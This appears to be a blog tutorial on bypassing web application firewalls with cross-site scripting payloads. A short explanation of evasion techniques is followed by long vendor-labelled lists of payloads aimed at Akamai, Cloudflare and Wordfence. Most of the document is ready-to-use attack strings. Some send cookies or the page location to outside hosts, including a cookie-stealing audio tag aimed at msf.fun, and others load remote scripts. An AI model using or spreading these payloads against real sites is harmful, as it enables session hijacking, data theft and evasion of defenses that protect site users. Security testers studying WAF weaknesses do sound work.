Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks 🙂 !! In this tutorial, we will describe some of the techniques commonly used by hackers to bypass Web Application Firewalls (WAF) during XSS exploitation.

Let’s See 🙂 !!

Introduction Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we’ll explore some techniques used to bypass WAFs and execute XSS payloads successfully.

Understanding XSS and WAFs Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.

WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.

Common WAF Bypass Techniques

• Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through.

<img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/">

• Using Alternate Event Handlers: WAFs may specifically filter common event handlers like onload or onerror. Attackers can use less common event handlers that may not be included in the WAF’s rule set.

<div style="width:expression(alert(1))"></div>

• Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.

<script>/*</script><svg onload=alert(1)>*/

• Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety.

<img src='1' onerror='ja'+'vascript:alert(1)'>

• Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF’s inspection process.

GET / HTTP/1.1
Host: victim.com
Content-Length: 0
X-Forwarded-For: '><script>alert(1)</script>

Now let’s have a look some waf bypass pyaloads 🙂 !!

Akamai XSS Payloads

<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
https://twitter.com/xhzeem/status/1378316651431612422

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click -@stealthybugs

Cloudflare XSS payloads

<a"/>

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

<x/>

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert)   or    (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><div><meter onmouseover="alert(1)"</div>" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
Wordfence 7.4.2
<a href=&#01javascript:alert(1)> -@brutelogic
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>